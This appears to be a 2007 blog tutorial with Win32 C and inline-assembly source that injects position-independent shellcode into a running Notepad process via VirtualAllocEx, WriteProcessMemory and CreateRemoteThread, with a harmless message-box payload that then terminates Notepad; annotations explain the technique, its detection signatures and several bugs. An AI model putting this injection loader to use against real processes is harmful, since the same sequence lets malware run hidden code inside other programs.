
lunes, 15 de octubre de 2007

Code Injection - Win32

The following example code locates a running Notepad instance and injects code into it that pops up a blank message box. It works only on Win2K and above [tested only on WinXP SP2].

In your project settings, turn off incremental compilation and linking; otherwise the code-size detection may fail.


#include
#include
#include

/* Everything up to the matching "#pragma code_seg()" below is emitted into a
 * dedicated ".injseg" section, so InjectCode and InjectCode_EndMarker are laid
 * out back to back and the byte range between them can be copied as one unit.
 * (The linker directive further down marks that section RWX, which is what
 * lets DoSomeInjection patch the address slots of InjectCode in place.) */
#pragma code_seg(".injseg")
/* Position-independent payload: these bytes are copied verbatim into the
 * target process by DoSomeInjection and run there as a thread start routine.
 * __declspec(naked) suppresses the compiler prologue/epilogue, so the bytes
 * of the function are exactly the __asm block below.  The two 4-byte slots
 * at addrMessageBox / addrExitProcess are zero in the source; DoSomeInjection
 * overwrites them with real addresses before the copy is made.
 * lpParameter is never read.  The routine does not return: it ends by
 * calling ExitProcess inside the target. */
__declspec( naked ) static DWORD WINAPI InjectCode(LPVOID lpParameter)
{
__asm
{
// Delta trick: "call" pushes the run-time address of get_delta, "pop" moves
// it into ebp, and subtracting the link-time offset of the same label leaves
// ebp = (run-time base - link-time base).  Every label reference below is
// ebp-relative, so the code works wherever it has been copied to.
call get_delta
get_delta:
pop ebp
sub ebp, offset get_delta

// Fetch the MessageBoxA address that the injector patched into the slot.
lea esi, dword ptr [ebp + addrMessageBox]
mov eax, dword ptr [esi]

// MessageBoxA(NULL, NULL, NULL, MB_OK); stdcall, arguments pushed right to
// left, callee cleans the stack.  Null text/caption is what makes it "blank".
push MB_OK
push 0
push 0
push NULL
call eax

// ExitProcess(0) -- this terminates the *target* process (the one we were
// injected into), so nothing after this point executes.
lea esi, dword ptr [ebp + addrExitProcess]
mov eax, dword ptr [esi]
push 0
call eax

// Inline data.  "kernel32.dll\0\0" is not referenced by any instruction
// above (presumably left over from a LoadLibrary-based variant); it only
// occupies space ahead of the two address slots.
__emit 6Bh //k
__emit 65h //e
__emit 72h //r
__emit 6Eh //n
__emit 65h //e
__emit 6Ch //l
__emit 33h //3
__emit 32h //2
__emit 2Eh //.
__emit 64h //d
__emit 6Ch //l
__emit 6Ch //l
__emit 00h //\0
__emit 00h //\0

// 4-byte slot, patched by DoSomeInjection with (DWORD)&MessageBoxA.
// DoSomeInjection locates it as InjectCode_EndMarker - 8, which only lines
// up if the linker places InjectCode_EndMarker immediately after the last
// __emit with no padding in between.
addrMessageBox:
__emit 00h
__emit 00h
__emit 00h
__emit 00h

// 4-byte slot, patched by DoSomeInjection with (DWORD)&ExitProcess
// (located as InjectCode_EndMarker - 4; same layout assumption as above).
addrExitProcess:
__emit 00h
__emit 00h
__emit 00h
__emit 00h
}
}

/* Layout sentinel, never called.  Its address marks the end of the InjectCode
 * bytes: DoSomeInjection uses (EndMarker - InjectCode) as the payload size and
 * (EndMarker - 8) / (EndMarker - 4) as the two address slots.  The body must
 * stay empty and the function must remain the next symbol in .injseg. */
static void InjectCode_EndMarker (void){}

/* Back to the default code section for the rest of the file. */
#pragma code_seg()
/* Make .injseg readable, writable and executable in the injector's own image:
 * DoSomeInjection writes the function addresses straight into InjectCode's
 * bytes, which would fault in an ordinary read+execute code section.  Note
 * this leaves an RWX section in the injector binary itself, which is one of
 * the things static scanners and hardening checks (e.g. image-section audits)
 * report. */
#pragma comment(linker, "/SECTION:.injseg,RWX")

/* Copies the InjectCode byte range into process dwProcessId and runs it on a
 * new remote thread.
 *
 * Returns TRUE once the remote thread has been created and waited on, FALSE
 * on any failure (each failure prints a message via _tprintf).  The caller
 * must be able to open the target with PROCESS_ALL_ACCESS.
 *
 * NOTE(review): OpenProcess(PROCESS_ALL_ACCESS) -> VirtualAllocEx(RWX) ->
 * WriteProcessMemory -> CreateRemoteThread is the textbook remote-thread
 * injection sequence, and it is exactly the sequence endpoint monitoring
 * keys on (cross-process executable allocation followed by a thread started
 * at that address).  Process mitigation policies that block remote thread
 * creation or dynamic code defeat it. */
BOOL DoSomeInjection(DWORD dwProcessId)
{
BOOL bRet = FALSE;
BOOL bOK = FALSE;
HANDLE hProcess = NULL;
HANDLE hRemoteThread = NULL;
LPVOID lpInjectCode = NULL;
/* Payload size = distance between the two functions in .injseg.  Only valid
 * when the linker kept them adjacent (hence the advice to disable incremental
 * linking). */
const DWORD dwCodeSize = ((LPBYTE) InjectCode_EndMarker - (LPBYTE) InjectCode);
/* Bytes actually written by WriteProcessMemory; never compared against
 * dwCodeSize, so a short write would go unnoticed. */
DWORD dwTemp = 0;

/* Single-pass loop used as a break-out scope; cleanup follows the loop. */
do
{
/* Patch the two address slots at the tail of InjectCode in place (this is a
 * write into the injector's own code bytes, which is why .injseg is RWX).
 * Assumes the slots are the last 8 bytes before InjectCode_EndMarker and
 * that user32.dll / kernel32.dll are mapped at the same addresses in the
 * target as in this process -- confirm for the platform in use. */
*(((LPDWORD)InjectCode_EndMarker) - 2) = (DWORD)&MessageBoxA;
*(((LPDWORD)InjectCode_EndMarker) - 1) = (DWORD)&ExitProcess;


/* PROCESS_ALL_ACCESS is far more than the VM_OPERATION/VM_WRITE/
 * CREATE_THREAD rights this routine actually uses. */
hProcess = OpenProcess( PROCESS_ALL_ACCESS,
FALSE,
dwProcessId
);

if(NULL == hProcess)
{
_tprintf(_T("OpenProcess Failed!\n"));
break;
}

/* Remote buffer is RWX: writable for the copy, executable for the thread. */
lpInjectCode = VirtualAllocEx(
hProcess,
NULL,
dwCodeSize,
MEM_RESERVE|MEM_COMMIT,
PAGE_EXECUTE_READWRITE
);

if(NULL == lpInjectCode)
{
_tprintf(_T("VirtualAllocEx Failed!\n"));
break;
}

bOK = WriteProcessMemory(hProcess, lpInjectCode, (LPVOID)InjectCode, dwCodeSize, &dwTemp);

if(FALSE == bOK)
{
_tprintf(_T("WriteProcessMemory Failed!\n"));
break;
}

/* Start execution at the first byte of the copied buffer; the thread
 * parameter is NULL and InjectCode ignores it anyway. */
hRemoteThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpInjectCode, NULL, 0, NULL);

if(NULL == hRemoteThread)
{
_tprintf(_T("CreateRemoteThread Failed!\n"));
break;
}

/* The payload ends with ExitProcess in the target, so on the success path
 * this wait returns because the whole target process has gone away, not
 * merely because the thread finished. */
WaitForSingleObject( hRemoteThread, INFINITE);
bRet = TRUE;
} while(false);

/* NOTE(review): with MEM_RELEASE the size argument must be 0; passing
 * dwCodeSize makes VirtualFreeEx fail, and its return value is not checked.
 * On the success path the target has already exited, which masks this; on
 * the WriteProcessMemory/CreateRemoteThread failure paths the remote buffer
 * is leaked in the still-running target. */
if(NULL != lpInjectCode)
{
VirtualFreeEx( hProcess, lpInjectCode, dwCodeSize, MEM_RELEASE);
lpInjectCode = NULL;
}

if(NULL != hRemoteThread)
{
CloseHandle(hRemoteThread);
hRemoteThread = NULL;
}

if(NULL != hProcess)
{
CloseHandle(hProcess);
hProcess = NULL;
}

return bRet;
}

/* Entry point: find the first top-level window of class "Notepad", resolve
 * the process that owns it and hand that process id to DoSomeInjection.
 * argc/argv are unused.  If no Notepad window exists, FindWindow returns
 * NULL, GetWindowThreadProcessId leaves dwProcId at 0 and DoSomeInjection's
 * OpenProcess fails with its own message; main still returns 0.  The narrow
 * "Notepad" literal means this compiles only in a non-UNICODE build. */
int main(int argc, char* argv[])
{
    DWORD dwProcId = 0;
    HWND hNotepad;

    (void)argc;
    (void)argv;

    hNotepad = FindWindow("Notepad", NULL);
    GetWindowThreadProcessId(hNotepad, &dwProcId);
    (void)DoSomeInjection(dwProcId);

    return 0;
}
